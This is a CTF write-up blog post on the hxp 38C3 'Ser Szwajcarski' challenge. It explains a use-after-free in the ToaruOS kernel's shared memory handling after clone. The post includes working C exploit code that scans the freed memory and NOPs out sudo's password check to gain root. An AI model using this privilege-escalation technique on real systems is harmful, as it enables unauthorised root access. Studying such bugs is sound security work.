hxp 38C3 CTF: Ser Szwajcarski 🧀
Mar 2, 2025 Binary Exploitation CTFSer Szwajcarski 🧀 was a challenge in hxp 38C3 CTF, The goal was to find and exploit a zero- or n-day vulnerability in ToaruOS. ToaruOS is a hobby operating system and is intended as an educational resource rather than a fully-fledged OS for everyday use, so security is not a primary consideration and there are plenty of vulnerabilities to be found. On top of that, the version in use, 2.2.0, was already over a year old at the time. For these reasons the challenge was in the “baby” category with an estimated difficulty of easy. Despite that, it’s a really cool OS and the challenge was a lot of fun, so I’m writing about it anyway.
During the competition I looked over the commit history and found
this bug fix.
Prior to this commit, a normal user could read and write to arbitrary kernel
memory via the send
and recv
syscalls. Turning this into root privileges is
straightforward and is not the focus of this post. Instead, I want to look at a
new bug I found in the shared memory subsystem after the competition was over.
Shared Memory
In ToaruOS, each thread of execution is represented by a
process_t
structure. Note that this differs from the usual meaning of the term; a process
is typically thought of as something that can contain one or more threads, but
in ToaruOS each “thread” in the traditional sense is a process of its own. The
relevant fields are shown below.
typedef struct process {
...
list_t * shm_mappings;
...
thread_t thread;
...
} process_t;
The thread
field, of type
thread_t,
contains the information needed to update the state of the CPU to begin or
continue executing this process. This includes the values of the registers and
the root of the page tables that determine the process’s virtual memory layout.
typedef struct thread {
...
page_directory_t * page_directory;
} thread_t;
Multiple processes can opt to share regions of memory. When this happens, each
process has some part of its virtual address space mapped to an underlying
region of physical memory that is also mapped by the other processes. The
shm_mappings
field of process_t
holds a list of such shared memory mappings.
To manage shared memory the kernel maintains a tree resembling a hierarchical
file system. Each node in this tree has a name, and each leaf node points to a
“chunk” of type
shm_chunk_t
,
a reference counted structure that keeps track of a range of shared physical
memory.
typedef struct {
struct shm_node * parent;
volatile uint8_t lock;
ssize_t ref_count;
size_t num_frames;
uintptr_t *frames;
} shm_chunk_t;
typedef struct shm_node {
char name[256];
shm_chunk_t * chunk;
} shm_node_t;
A process can request a shared memory region by passing a path through this tree
to the
shm_obtain
syscall in a form similar to a file path (albeit with dots instead of slashes).
After ensuring a chunk exists at this path by allocating a new one if needed,
the chunk is mapped into the calling process and added to its shm_mappings
list.
When a process exits,
shm_release_all
iterates over its shm_mappings
and calls
release_chunk
on each chunk, where the chunk’s reference count is decremented. If it reaches
zero, the physical memory backing the chunk is freed.
Evil Clone
The
clone
syscall creates a new process via
spawn_process
with the same virtual address space as its parent, including any shared
mappings. However, the shared mappings are not added to the new process’s
shm_mappings
list and the reference counts of the corresponding chunks are not
increased.
pid_t clone(uintptr_t new_stack, uintptr_t thread_func, uintptr_t arg) {
...
process_t * new_proc = spawn_process(this_core->current_process, 1);
new_proc->thread.page_directory = this_core->current_process->thread.page_directory;
...
}
process_t * spawn_process(volatile process_t * parent, int flags) {
...
proc->shm_mappings = list_create("process shm mappings",proc);
...
}
To see why this is a problem, suppose a process that is the only user of some
shared memory chunk calls clone
.
When the process exits, the last known reference to the chunk is gone and so it is freed, even though the underlying physical memory is still accessible from the cloned process.
Now if something else (a privileged process, for example) makes use of that freed memory, the cloned process is able to corrupt it.
Exploitation
Exploiting this bug is fairly simple: allocate some shared memory, call clone
,
and exit the parent process while the child scans through the freed memory
waiting for something sensitive to reuse it. I chose to patch the password check
of sudo
to always succeed.
#include <pthread.h>
#include <stdint.h>
#include <string.h>
#include <sys/shm.h>
uint8_t *shm;
size_t size = 0x1000000;
void *routine(void *arg) {
(void)arg;
for (;;) {
for (size_t offset = 0; offset < size; offset += 0x1000) {
uint8_t *page = shm + offset;
if (memcmp(page + 0x1c9, "\xe8\x22\xfa\xff\xff", 5) == 0) {
memcpy(page + 0x1c9, "\x90\x90\x90\x90\x90", 5);
}
}
}
return NULL;
}
int main(void) {
shm = shm_obtain("asdf", &size);
memset(shm, 0, size);
pthread_t thread;
pthread_create(&thread, NULL, routine, NULL);
return 0;
}
And the result:
Swiss Cheese
Many other issues were found during and after the competition. My teammate and good friend Krishna had a look at this challenge after the CTF and posted a great write-up of his solution here, and several other people have reported their findings to the ToaruOS issue tracker.
Again, security is not a design goal of ToaruOS, and bugs like this are found quite often even in huge projects with many developers that are focused on security. This challenge should not be seen as a condemnation of the (single!) developer, but rather as a fun exercise and a chance to play with a really neat OS.